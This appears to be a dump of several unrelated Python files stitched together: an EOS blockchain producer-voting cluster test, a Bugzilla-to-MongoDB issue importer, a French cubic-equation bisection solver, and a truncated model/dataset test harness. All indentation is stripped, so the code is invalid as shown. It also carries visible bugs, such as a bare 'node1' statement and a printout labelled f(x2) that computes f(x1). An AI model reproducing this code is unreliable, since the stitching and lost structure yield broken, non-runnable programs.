Utils.cmdError("only saw %s producers of expected 21. At blockNum %s only the following producers were seen: %s" % (len(prodsSeenKeys), blockNum, ",".join(prodsSeenKeys)))
Utils.errorExit("Failed because of missing block producers")
Utils.Debug=temp
Print=Utils.Print
errorExit=Utils.errorExit
from core_symbol import CORE_SYMBOL
args = TestHelper.parse_args({"--prod-count","--dump-error-details","--keep-logs","-v","--leave-running","--clean-run",
"--p2p-plugin","--wallet-port"})
Utils.Debug=args.v
totalNodes=4
cluster=Cluster(walletd=True)
dumpErrorDetails=args.dump_error_details
keepLogs=args.keep_logs
dontKill=args.leave_running
prodCount=args.prod_count
killAll=args.clean_run
p2pPlugin=args.p2p_plugin
walletPort=args.wallet_port
walletMgr=WalletMgr(True, port=walletPort)
testSuccessful=False
killEosInstances=not dontKill
killWallet=not dontKill
WalletdName=Utils.EosWalletName
ClientName="cleos"
try:
TestHelper.printSystemInfo("BEGIN")
cluster.setWalletMgr(walletMgr)
cluster.killall(allInstances=killAll)
cluster.cleanup()
time.sleep(5)
Print("Stand up cluster")
if cluster.launch(prodCount=prodCount, onlyBios=False, pnodes=totalNodes, totalNodes=totalNodes, totalProducers=totalNodes*21, p2pPlugin=p2pPlugin, useBiosBootFile=False) is False:
Utils.cmdError("launcher")
Utils.errorExit("Failed to stand up eos cluster.")
Print("Validating system accounts after bootstrap")
cluster.validateAccounts(None)
accounts=cluster.createAccountKeys(5)
if accounts is None:
Utils.errorExit("FAILURE - create keys")
accounts[0].name="tester111111"
accounts[1].name="tester222222"
accounts[2].name="tester333333"
accounts[3].name="tester444444"
accounts[4].name="tester555555"
testWalletName="test"
Print("Creating wallet \"%s\"." % (testWalletName))
testWallet=walletMgr.create(testWalletName, [cluster.eosioAccount,accounts[0],accounts[1],accounts[2],accounts[3],accounts[4]])
for _, account in cluster.defProducerAccounts.items():
walletMgr.importKey(account, testWallet, ignoreDupKeyWarning=True)
Print("Wallet \"%s\" password=%s." % (testWalletName, testWallet.password.encode("utf-8")))
for i in range(0, totalNodes):
node=cluster.getNode(i)
node.producers=Cluster.parseProducers(i)
for prod in node.producers:
trans=node.regproducer(cluster.defProducerAccounts[prod], "http::/mysite.com", 0, waitForTransBlock=False, exitOnError=True)
node0=cluster.getNode(0)
node1=cluster.getNode(1)
node2=cluster.getNode(2)
node3=cluster.getNode(3)
node=node0
# create accounts via eosio as otherwise a bid is needed
for account in accounts:
Print("Create new account %s via %s" % (account.name, cluster.eosioAccount.name))
trans=node.createInitializeAccount(account, cluster.eosioAccount, stakedDeposit=0, waitForTransBlock=False, stakeNet=1000, stakeCPU=1000, buyRAM=1000, exitOnError=True)
transferAmount="100000000.0000 {0}".format(CORE_SYMBOL)
Print("Transfer funds %s from account %s to %s" % (transferAmount, cluster.eosioAccount.name, account.name))
node.transferFunds(cluster.eosioAccount, account, transferAmount, "test transfer")
trans=node.delegatebw(account, 20000000.0000, 20000000.0000, waitForTransBlock=True, exitOnError=True)
# containers for tracking producers
prodsActive={}
for i in range(0, 4):
node=cluster.getNode(i)
ProducerToNode.populate(node, i)
for prod in node.producers:
prodsActive[prod]=False
#first account will vote for node0 producers, all others will vote for node1 producers
node=node0
for account in accounts:
trans=node.vote(account, node.producers, waitForTransBlock=True)
node=node1
setActiveProducers(prodsActive, node1.producers)
verifyProductionRounds(trans, node2, prodsActive, 2)
# test shifting all 21 away from one node to another
# first account will vote for node2 producers, all others will vote for node3 producers
node1
for account in accounts:
trans=node.vote(account, node.producers, waitForTransBlock=True)
node=node2
setActiveProducers(prodsActive, node2.producers)
verifyProductionRounds(trans, node1, prodsActive, 2)
testSuccessful=True
finally:
TestHelper.shutdown(cluster, walletMgr, testSuccessful, killEosInstances, killWallet, keepLogs, killAll, dumpErrorDetails)
exit(0)
|
the-stack_0_1641 | import sys
import dateutil.parser
from mongoengine import DoesNotExist
import copy
from issueshark.backends.basebackend import BaseBackend
from issueshark.backends.helpers.bugzillaagent import BugzillaAgent
from validate_email import validate_email
import logging
from pycoshark.mongomodels import Issue, People, Event, IssueComment
logger = logging.getLogger('backend')
class BugzillaBackend(BaseBackend):
"""
Backend that collects data from a Bugzilla REST API
"""
@property
def identifier(self):
"""
Identifier (bugzilla)
"""
return 'bugzillaOld'
def __init__(self, cfg, issue_system_id, project_id):
"""
Initialization
Initializes the people dictionary see: :func:`~issueshark.backends.bugzilla.BugzillaBackend._get_people`
Initializes the attribute mapping: Maps attributes from the bugzilla API to our database design
:param cfg: holds als configuration. Object of class :class:`~issueshark.config.Config`
:param issue_system_id: id of the issue system for which data should be collected. :class:`bson.objectid.ObjectId`
:param project_id: id of the project to which the issue system belongs. :class:`bson.objectid.ObjectId`
"""
super().__init__(cfg, issue_system_id, project_id)
logger.setLevel(self.debug_level)
self.bugzilla_agent = None
self.people = {}
self.at_mapping = {
'assigned_to_detail': 'assignee_id',
'blocks': 'issue_links',
'component': 'components',
'creation_time': 'created_at',
'creator_detail': 'creator_id',
'depends_on': 'issue_links',
'dupe_of': 'issue_links',
'keywords': 'labels',
'last_change_time': 'updated_at',
'op_sys': 'environment',
'platform': 'platform',
'resolution': 'resolution',
'severity': 'priority',
'status': 'status',
'summary': 'title',
'target_milestone': 'fix_versions',
'version': 'affects_versions'
}
def process(self):
"""
Gets all the issues and their updates
1. Gets the last stored issues updated_at field
2. Gets all issues that was last change since this value
3. Processes the results in 50-steps
4. For each issue calls: :func:`issueshark.backends.bugzilla.BugzillaBackend._process_issue`
"""
self.bugzilla_agent = BugzillaAgent(logger, self.config)
# Get last modification date (since then, we will collect bugs)
last_issue = Issue.objects(issue_system_id=self.issue_system_id).order_by('-updated_at')\
.only('updated_at').first()
starting_date = None
if last_issue is not None:
starting_date = last_issue.updated_at
# Get all issues
issues = self.bugzilla_agent.get_bug_list(last_change_time=starting_date, limit=50)
# If no new bugs found, return
if len(issues) == 0:
logger.info('No new issues found. Exiting...')
sys.exit(0)
# Otherwise, go through all issues
processed_results = 50
while len(issues) > 0:
logger.info("Processing %d issues..." % len(issues))
for issue in issues:
logger.info("Processing issue %s" % issue['id'])
self._process_issue(issue)
# Go through the next issues
issues = self.bugzilla_agent.get_bug_list(last_change_time=starting_date, limit=50, offset=processed_results)
processed_results += 50
def _process_issue(self, issue):
"""
Processes the issue in several steps:
1. Get all comments. See: :func:`issueshark.backends.helpers.bugzillaagent.BugzillaAgent.get_comments`
2. Get the whole issue history.\
See: :func:`issueshark.backends.helpers.bugzillaagent.BugzillaAgent.get_issue_history`
3. Transforms the issue to our issue model. \
See: :func:`issueshark.backends.bugzilla.BugzillaBackend._transform_issue`
4. Go through the history of the issue (newest to oldes) and set back the issue step by step. During this \
processing: Store the events. See: :func:`issueshark.backends.bugzilla.BugzillaBackend._process_event`
5. Process all comments. See: :func:`issueshark.backends.bugzilla.BugzillaBackend._process_comments`
:param issue: issue that was got from the bugzilla REST API
"""
# Transform issue
comments = self.bugzilla_agent.get_comments(issue['id'])
histories = self.bugzilla_agent.get_issue_history(issue['id'])
mongo_issue = self._transform_issue(issue, comments)
logger.debug('Transformed issue: %s', mongo_issue)
# Go through history
# 1) Set back issue
# 2) Store events
j = 0
events_to_insert = []
for history in reversed(histories):
i = 0
change_date = dateutil.parser.parse(history['when'])
author_id = self._get_people(history['who'])
for bz_event in history['changes']:
logger.debug("Processing event: %s" % bz_event)
unique_event_id = str(issue['id'])+"%%"+str(i)+"%%"+str(j)
mongo_event, is_new_event = self._process_event(unique_event_id, bz_event, mongo_issue, change_date,
author_id)
logger.debug('Newly created?: %s, Resulting event: %s' % (is_new_event, mongo_event))
# Append to list if event is not stored in db
if is_new_event:
events_to_insert.append(mongo_event)
i += 1
j += 1
# Update issue to the original version
mongo_issue.save()
# Store events
if events_to_insert:
Event.objects.insert(events_to_insert, load_bulk=False)
# Store comments
self._process_comments(mongo_issue.id, comments)
def _process_comments(self, mongo_issue_id, comments):
"""
Processes the comments for an issue
:param mongo_issue_id: Object of class :class:`bson.objectid.ObjectId`. Identifier of the document that holds
the issue information
:param comments: comments that were received from the bugzilla API
"""
# Go through all comments of the issue
comments_to_insert = []
logger.info('Processing %d comments...' % (len(comments)-1))
i = -1
for comment in comments:
# Comment with count 0 is the description of the bug
if comment['count'] == 0:
continue
i += 1
logger.debug('Processing comment: %s' % comment)
unique_comment_id = "%s%%%s" % (mongo_issue_id, i)
try:
IssueComment.objects(external_id=unique_comment_id, issue_id=mongo_issue_id).get()
continue
except DoesNotExist:
mongo_comment = IssueComment(
external_id=unique_comment_id,
issue_id=mongo_issue_id,
created_at=dateutil.parser.parse(comment['creation_time']),
author_id=self._get_people(comment['creator']),
comment=comment['text'],
)
logger.debug('Resulting comment: %s' % mongo_comment)
comments_to_insert.append(mongo_comment)
# If comments need to be inserted -> bulk insert
if comments_to_insert:
IssueComment.objects.insert(comments_to_insert, load_bulk=False)
def _process_event(self, unique_event_id, bz_event, mongo_issue, change_date, author_id):
"""
Processes the event. During the event processing the Issue is set back to its original state
before the event occured.
:param unique_event_id: unique identifier of the event
:param bz_event: event that was received from the bugzilla API
:param mongo_issue: issue that is/should be stored in the mongodb
:param change_date: date when the event was created
:param author_id: :class:`bson.objectid.ObjectId` of the author of the event
"""
is_new_event = True
try:
mongo_event = Event.objects(external_id=unique_event_id, issue_id=mongo_issue.id).get()
is_new_event = False
except DoesNotExist:
mongo_event = Event(
external_id=unique_event_id,
issue_id=mongo_issue.id,
created_at=change_date,
author_id=author_id
)
# We need to map back the status from the bz terminology to ours. Special: The assigned_to must be mapped to
# assigned_to_detail beforehand, as we are using this for the issue parsing
if bz_event['field_name'] == 'assigned_to':
bz_at_name = 'assigned_to_detail'
else:
bz_at_name = bz_event['field_name']
try:
mongo_event.status = self.at_mapping[bz_at_name]
except KeyError:
logger.warning('Mapping for attribute %s not found.' % bz_at_name)
mongo_event.status = bz_at_name
# Check if the mongo_issue has the attribute.
# If yes: We can use the mongo_issue to set the old and new value of the event
# If no: We use the added / removed fields
if hasattr(mongo_issue, mongo_event.status):
mongo_event.new_value = copy.deepcopy(getattr(mongo_issue, mongo_event.status))
self._set_back_mongo_issue(mongo_issue, mongo_event.status, bz_event)
mongo_event.old_value = copy.deepcopy(getattr(mongo_issue, mongo_event.status))
else:
mongo_event.new_value = bz_event['added']
mongo_event.old_value = bz_event['removed']
return mongo_event, is_new_event
def _set_back_mongo_issue(self, mongo_issue, mongo_at_name, bz_event):
"""
Method to set back the issue stored in the mongodb
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
function_mapping = {
'title': self._set_back_string_field,
'priority': self._set_back_priority,
'status': self._set_back_string_field,
'affects_versions': self._set_back_array_field,
'components': self._set_back_array_field,
'labels': self._set_back_array_field,
'resolution': self._set_back_string_field,
'fix_versions': self._set_back_array_field,
'assignee_id': self._set_back_assignee,
'issue_links': self._set_back_issue_links,
'environment': self._set_back_string_field,
'platform': self._set_back_string_field
}
correct_function = function_mapping[mongo_at_name]
correct_function(mongo_issue, mongo_at_name, bz_event)
def _set_back_priority(self, mongo_issue, mongo_at_name, bz_event):
"""
Sets back the priority of the issue before the event
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
if bz_event['removed'] == 'enhancement':
mongo_issue.issue_type = 'Enhancement'
else:
mongo_issue.issue_type = 'Bug'
mongo_issue.priority = bz_event['removed']
def _set_back_issue_links(self, mongo_issue, mongo_at_name, bz_event):
"""
Sets back the link to the issue before the event
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
type_mapping = {
'blocks': 'Blocker',
'dupe_of': 'Duplicate',
'depends_on': 'Dependent',
}
item_list = getattr(mongo_issue, mongo_at_name)
# Everything that is in "removed" must be added
if bz_event['removed']:
issue_id = self._get_issue_id_by_system_id(bz_event['removed'])
if issue_id not in [entry['issue_id'] for entry in item_list]:
item_list.append({'issue_id': issue_id, 'type': type_mapping[bz_event['field_name']],
'effect': bz_event['field_name']})
# Everything that is in "added" must be removed
if bz_event['added']:
issue_id = self._get_issue_id_by_system_id(bz_event['added'])
found_index = 0
for stored_issue in item_list:
if stored_issue['issue_id'] == issue_id:
break
found_index += 1
try:
del item_list[found_index]
except IndexError:
logger.warning('Could not process event %s completely. Did not found issue to delete Issue %s' %
(bz_event, mongo_issue))
setattr(mongo_issue, mongo_at_name, item_list)
def _set_back_assignee(self, mongo_issue, mongo_at_name, bz_event):
"""
Sets back the assignee of the issue before the event
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
if bz_event['removed']:
setattr(mongo_issue, mongo_at_name, self._get_people(bz_event['removed']))
else:
setattr(mongo_issue, mongo_at_name, None)
def _set_back_string_field(self, mongo_issue, mongo_at_name, bz_event):
"""
Sets back normal string fields, e.g., title, of the issue before the event
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
setattr(mongo_issue, mongo_at_name, bz_event['removed'])
def _set_back_array_field(self, mongo_issue, mongo_at_name, bz_event):
"""
Sets back array fields, e.g., components, of the issue before the event
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
item_list = getattr(mongo_issue, mongo_at_name)
# Everything that is in "added" must be removed
if bz_event['added']:
# We try to remove the item. If it is not in there, we remove the whole list. Observations showed,
# that this is most likely the correct decision
try:
item_list.remove(bz_event['added'])
except ValueError:
item_list.clear()
# Everything that is in "removed" must be added
if bz_event['removed'] and bz_event['removed'] not in item_list:
item_list.append(bz_event['removed'])
setattr(mongo_issue, mongo_at_name, item_list)
def _parse_bz_field(self, bz_issue, at_name_bz):
"""
Parses fields from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
field_mapping = {
'assigned_to_detail': self._parse_author_details,
'blocks': self._parse_issue_links,
'component': self._parse_string_field,
'creation_time': self._parse_date_field,
'creator_detail': self._parse_author_details,
'depends_on': self._parse_issue_links,
'dupe_of': self._parse_issue_links,
'keywords': self._parse_array_field,
'last_change_time': self._parse_date_field,
'op_sys': self._parse_string_field,
'platform': self._parse_string_field,
'resolution': self._parse_string_field,
'severity': self._parse_string_field,
'status': self._parse_string_field,
'summary': self._parse_string_field,
'target_milestone': self._parse_string_field,
'version': self._parse_string_field,
}
correct_function = field_mapping.get(at_name_bz)
return correct_function(bz_issue, at_name_bz)
def _parse_author_details(self, bz_issue, at_name_bz):
"""
Parses author details from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
if 'email' in bz_issue[at_name_bz]:
return self._get_people(bz_issue[at_name_bz]['name'], bz_issue[at_name_bz]['email'],
bz_issue[at_name_bz]['real_name'])
else:
return self._get_people(bz_issue[at_name_bz]['name'])
def _parse_string_field(self, bz_issue, at_name_bz):
"""
Parses string fields from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
return bz_issue[at_name_bz]
def _parse_array_field(self, bz_issue, at_name_bz):
"""
Parses array fields from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
return bz_issue[at_name_bz]
def _parse_issue_links(self, bz_issue, at_name_bz):
"""
Parses the issue links from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
type_mapping = {
'blocks': 'Blocker',
'dupe_of': 'Duplicate',
'depends_on': 'Dependent',
}
issue_links = []
if isinstance(bz_issue[at_name_bz], list):
for link in bz_issue[at_name_bz]:
issue_links.append({
'issue_id': self._get_issue_id_by_system_id(link),
'type': type_mapping[at_name_bz],
'effect': at_name_bz
})
else:
if bz_issue[at_name_bz] is not None:
issue_links.append({
'issue_id': self._get_issue_id_by_system_id(bz_issue[at_name_bz]),
'type': type_mapping[at_name_bz],
'effect': at_name_bz
})
return issue_links
def _parse_date_field(self, bz_issue, at_name_bz):
"""
Parses the date field from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
return dateutil.parser.parse(bz_issue[at_name_bz])
def _transform_issue(self, bz_issue, bz_comments):
"""
Transforms the issue from an bugzilla issue to our issue model
:param bz_issue: bugzilla issue (returned by the API)
:param bz_comments: comments to the bugzilla issue (as the first comment is the description of the issue)
:return:
"""
try:
mongo_issue = Issue.objects(issue_system_id=self.issue_system_id, external_id=str(bz_issue['id'])).get()
except DoesNotExist:
mongo_issue = Issue(
issue_system_id=self.issue_system_id,
external_id=str(bz_issue['id'])
)
# Set fields that can be directly mapped
for at_name_bz, at_name_mongo in self.at_mapping.items():
if isinstance(getattr(mongo_issue, at_name_mongo), list):
# Get the result and the current value and merge it together
result = self._parse_bz_field(bz_issue, at_name_bz)
current_value = getattr(mongo_issue, at_name_mongo, list())
if not isinstance(result, list):
result = [result]
# Extend
current_value.extend(result)
if len(current_value) > 0 and at_name_mongo == 'issue_links':
current_value = list({v['issue_id']: v for v in current_value}.values())
else:
current_value = list(set(current_value))
# Set the attribute
setattr(mongo_issue, at_name_mongo, copy.deepcopy(current_value))
else:
setattr(mongo_issue, at_name_mongo, self._parse_bz_field(bz_issue, at_name_bz))
# The first comment is the description! Bugzilla does not have a separate description field. The comment
# with the count == 0 is the description
for comment in bz_comments:
if comment['count'] == 0:
mongo_issue.desc = comment['text']
break
# Bugzilla does not have a separate field for the type. Therefore, we distinguish between bug an enhancement
# based on the severity information
if bz_issue['severity'] == 'enhancement':
mongo_issue.issue_type = 'Enhancement'
else:
mongo_issue.issue_type = 'Bug'
return mongo_issue.save()
def _get_mongo_attribute(self, field_name):
"""
Maps the attirbutes of the bugzilla api to the attributes of the document stored in the mongodb
:param field_name: field name that should be mapped
"""
return self.at_mapping[field_name]
def _get_people(self, username, email=None, name=None):
"""
Gets people from the people collection
:param username: username of the user
:param email: email of the user
:param name: name of the user
"""
# Check if user was accessed before. This reduces the amount of API requests
if username in self.people:
return self.people[username]
# If email and name are not set, make a request to get the user
if email is None and name is None:
user = self.bugzilla_agent.get_user(username)
# If the user is not found, we must use the username name
if user is None:
email = None
name = username
else:
email = user['email']
name = user['real_name']
# Check if email is none, this can happen as an email address may be excluded from the return value
if email is None:
# Check if the username is a valid email address, if yes use this
if validate_email(username):
email = username
else:
email = "[email protected]"
# Replace the email address "anonymization"
email = email.replace(' at ', '@').replace(' dot ', '.')
people_id = People.objects(name=name, email=email).upsert_one(name=name, email=email, username=username).id
self.people[username] = people_id
return people_id
def _get_issue_id_by_system_id(self, system_id):
"""
Gets the issue by their id that was assigned by the bugzilla ITS
:param system_id: id of the issue in the bugzilla ITS
"""
try:
issue_id = Issue.objects(issue_system_id=self.issue_system_id, external_id=str(system_id)).only('id').get().id
except DoesNotExist:
issue_id = Issue(issue_system_id=self.issue_system_id, external_id=str(system_id)).save().id
return issue_id
|
the-stack_0_1644 | # commentaire
# resolution approchée d'une equation du troisième degre
# version 2
import math
# Fonction calcul de delta
def calculerDelta(a, b, c):
return b**2-4*a*c
# Fonction Résolution Equation Second Degre
def resoudreEquationSecondDegre(a, b, c):
delta = calculerDelta(a, b, c)
if delta > 0:
racineDeDelta = math.sqrt(delta)
retour = [(-b-racineDeDelta)/(2*a), (-b+racineDeDelta)/(2*a)]
elif delta < 0:
retour = [] # liste vide
else:
retour = [-b/(2*a)] # liste d'un seul élément
return retour
# Fonction qui calcule la faleur de f(x)=a^3 + bx^2 + cx + d
def calculerFxPolynome3dg(x, a, b, c, d):
return a*x**3 + b*x**2 + c*x + d
# Fonction qui permet de comparer le signe de deux nombre. true = de même signe, false = de signe opposé
def compareSign(x, y):
if(x > 0 and y > 0) or (x < 0 and y < 0):
return True
else:
return False
# Fonction qui itére 100 fois entre deux valeurs x1 et x2 avec f(x1) et f(x2) de signe opposé et retournant la valeur x approchant de f(x)=0
def trouverFxEgal0(p1, p2, a, b, c, d):
for i in range(0, 100):
# Pour cela, prenons un point p0 milieu p1 et p2 et regardons si il est positif ou négatif
p0 = (p1+p2)/2
# calculons f(p0), f(p1) et f(p2)
fp0 = calculerFxPolynome3dg(p0, a, b, c, d)
fp1 = calculerFxPolynome3dg(p1, a, b, c, d)
fp2 = calculerFxPolynome3dg(p2, a, b, c, d)
# print("itération ", i, " : fp0 = ", fp0," fp1 = ", fp1, " fp2 = ", fp2)
if compareSign(fp0, fp1):
p1 = p0
p2 = p2
else:
p1 = p1
p2 = p0
return p0
# saisie des paramètres de la fonction f à l'aide de la fonction input
# input donnant une variable de type string, la fonction float la transforme en
# type décimale
print("Saisir les paramètres a,b,c,d de votre polynome du troisième degré a^3 + bx^2 + cx + d:")
a = float(input("Saisir la valeur de a="))
b = float(input("Saisir la valeur de b="))
c = float(input("Saisir la valeur de c="))
d = float(input("Saisir la valeur de d="))
# Calcul des paramètres de la fonction dérivée f'
A = 3*a
B = 2*b
C = c
print("La dérivée f' de la fonction f est ", A, "x^2 + ", B, "x + ", C)
# Calcul et affichage de l'équation du second degré f'
print("Résolution de l'équation f' ", A, "x^2 + ", B, "x + ", C)
delta = calculerDelta(A, B, C)
result = resoudreEquationSecondDegre(A, B, C)
# Condition sur delta de f' dans cet ordre >0 puis ==0 puis <0
if delta > 0:
# Ordonnons les résultats x1 et x2, solution de l'équation f'(x)=0
if result[0] > result[1]:
x1 = result[1]
x2 = result[0]
else:
x1 = result[0]
x2 = result[1]
print("Delta de f' est positif donc il y a 2 solutions")
print("x1 =", x1)
print("x2 =", x2)
# Déterminons les variations de f selon la valeur de Delta et le signe de A
if A > 0:
print("Delta de f' est positif ainsi que A donc les variations de f(x) sont les suivantes :")
print("pour x < ", x1, " f(x) est croissante")
print("pour ", x1, " < x < ", x2, " f(x) est decroissante")
print("pour x > ", x2, " f(x) est croissante")
else: # A est négatif
print("Delta de f' est positif et A est négatif donc les variations de f(x) sont les suivantes :")
print("pour x < ", result[0], " f(x) est décroissante")
print("pour ", result[0], " < x < ", result[1], " f(x) est croissante")
print("pour x > ", result[1], " f(x) est décroissante")
# Calculons f(x1) et f(x2), extremums de f pour Delta > 0 et A positif ou négatif
print("Calculons f(x1) et f(x2), extremum de f")
f1 = calculerFxPolynome3dg(x1, a, b, c, d)
f2 = calculerFxPolynome3dg(x2, a, b, c, d)
print("f1 =", f1)
print("f2 =", f2)
if (f1 < 0 and f2 > 0) or (f1 > 0 and f2 < 0):
print("Cas ou f1 et f2 sont de signes oposés. Il y a donc une solution f(x) = 0 pour x compris entre x1 et x2")
# Approchons la solution f(x) = 0 pour x compris entre x1 et x2
# ---------------------------------------------------------------
# Faisons une boucle qui calcul f(x) pour x compris entre x1 et x2
p1 = x1
p2 = x2
p0 = trouverFxEgal0(p1, p2, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x compris entre x1 et x2 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
# Approchons la solution f(x) = 0 pour x < x1
# ----------------------------------------------------
# trouvons un point x0 inférieur à x1 de sorte que f(x0) soit de signe opposé à f(x1)
x0 = x1 - 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), calculerFxPolynome3dg(x1, a, b, c, d)):
x0 = x0 - 1
print(
"Valeur de x0 de sorte que f(x0) et f(x1) soient de signe opposé avec x < x1 : ", x0)
print("Valeur de f(x0) ", calculerFxPolynome3dg(x0, a, b, c, d))
print("Valeur de f(x1) ", calculerFxPolynome3dg(x1, a, b, c, d))
p0 = trouverFxEgal0(x0, x1, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x < x1 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
# Approchons la solution f(x) = 0 pour x > x2
# ----------------------------------------------------
# trouvons un point x0 supérieur à x2 de sorte que f(x0) soit de signe opposé à f(x2)
x0 = x2 + 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), calculerFxPolynome3dg(x2, a, b, c, d)):
x0 = x0 + 1
print(
"Valeur de x0 de sorte que f(x0) et f(x2) soient de signe opposé avec x > x2 : ", x0)
print("Valeur de f(x0) ", calculerFxPolynome3dg(x0, a, b, c, d))
print("Valeur de f(x2) ", calculerFxPolynome3dg(x1, a, b, c, d))
p0 = trouverFxEgal0(x0, x2, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x > x2 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
else: # les extremums sont de mêmes signes
print("Cas ou f1 et f2 sont de même signes. Il n'y a donc pas de solution f(x) = 0 pour x compris entre x1 et x2")
if compareSign(f1, A):
print(
"f1 et A sont de même signe. Donc, il existe une solution x telle que f(x)=0 pour x < x1")
# Approchons la solution f(x) = 0 pour x < x1
# ----------------------------------------------------
# trouvons un point x0 inférieur à x1 de sorte que f(x0) soit de signe opposé à f(x1)
x0 = x1 - 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), calculerFxPolynome3dg(x1, a, b, c, d)):
x0 = x0 - 1
print(
"Valeur de x0 de sorte que f(x0) et f(x1) soient de signe opposé avec x < x1 : ", x0)
print("Valeur de f(x0) ", calculerFxPolynome3dg(x0, a, b, c, d))
print("Valeur de f(x1) ", calculerFxPolynome3dg(x1, a, b, c, d))
p0 = trouverFxEgal0(x0, x1, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x < x1 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
else:
print(
"f1 et A sont de signe opposé. Donc, il existe une solution x telle que f(x)=0 pour x > x2")
# Approchons la solution f(x) = 0 pour x > x2
# ----------------------------------------------------
# trouvons un point x0 supérieur à x2 de sorte que f(x0) soit de signe opposé à f(x2)
x0 = x2 + 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), calculerFxPolynome3dg(x2, a, b, c, d)):
x0 = x0 + 1
print(
"Valeur de x0 de sorte que f(x0) et f(x2) soient de signe opposé avec x > x2 : ", x0)
print("Valeur de f(x0) ", calculerFxPolynome3dg(x0, a, b, c, d))
print("Valeur de f(x2) ", calculerFxPolynome3dg(x1, a, b, c, d))
p0 = trouverFxEgal0(x0, x2, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x > x2 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
else: # Delta est null ou négatif
if delta == 0:
print("Delta de f' est nul donc il y a 1 solution unique")
print("x0 =", result[0])
# Déterminons les variations de f selon la valeur de Delta et le signe de A
if A > 0:
print("Delta de f' est null et A est postif donc f est toujours croissante")
else: # A est négatif
print(
"Delta de f' est null et A est négatif donc f est toujours décroissante")
else:
print("Pas de solution dans l'espace des réel pour f'(x)=0")
# Déterminons les variations de f selon la valeur de Delta et le signe de A
if A > 0:
print(
"Delta de f' est négatif et A est postif donc f est toujours croissante")
else: # A est négatif
print(
"Delta de f' est négatif et A est négatif donc f est toujours décroissante")
# Trouvons une valeur de x tel que f(0) et f(x) soit de signe opposé.
# Pour cela, comparons le signe de A et de d pour détermine si x pour f(x)=0 est positif ou négatif
if compareSign(A, d):
# Approchons la solution f(x) = 0 pour x < 0
# ----------------------------------------------------
# trouvons un point x0 inférieur à x1 de sorte que f(x0) soit de signe opposé à f(x1)
x0 = - 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), d):
x0 = x0 - 1
print(
"Valeur de x0 de sorte que f(x0) et d soient de signe opposé avec x < 0 : ", x0)
print("Valeur de f(x0) ", calculerFxPolynome3dg(x0, a, b, c, d))
p0 = trouverFxEgal0(x0, 0, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x < 0 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
else:
# Approchons la solution f(x) = 0 pour x > 0
# ------------------------------------------
# trouvons un point x0 supérieur à x2 de sorte que f(x0) soit de signe opposé à f(x2)
x0 = 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), d):
x0 = x0 + 1
print(
"Valeur de x0 de sorte que f(x0) et d soient de signe opposé avec x > 0 : ", x0)
print("Valeur de f(x0) ", calculerFxPolynome3dg(x0, a, b, c, d))
p0 = trouverFxEgal0(x0, 0, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x > 0 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
|
the-stack_0_1646 | import torch
import os
import configs
import datasets
import models
class BaseTest(object):
def __init__(self, model):
self.model = model
def run(self):
for model_cfg in models.allcfgs():
if hasattr(model_cfg, 'name') and model_cfg.name == self.model.__name__:
model_name = os.path.splitext(os.path.split(model_cfg._path)[1])[0]
print('Testing model: ' + model_name + ' ...')
for data_cfg in datasets.allcfgs():
if not self.model.check_cfg(data_cfg, model_cfg):
continue
data_name = os.path.splitext(os.path.split(data_cfg._path)[1])[0]
print('\tTesting dataset: ' + data_name + ' ...')
data_cfg.index_cross = 1
sample_dict = dict()
for name, value in vars(data_cfg).items():
if name.startswith('source') or name.startswith('target'):
kernel = getattr(data_cfg, 'kernel' if name.startswith('source') else 'out_kernel', None)
if kernel is not None:
sample_shape = (kernel.kT, kernel.kW, kernel.kH)
sample_dict[name] = torch.randn(configs.env.ci.batchsize, *sample_shape)
else:
sample_shape = (value.time, value.width, value.height) \
if hasattr(value, 'time') else [value.elements]
sample_dict[name] = torch.randint(value.classes, (configs.env.ci.batchsize, 1)).long() \
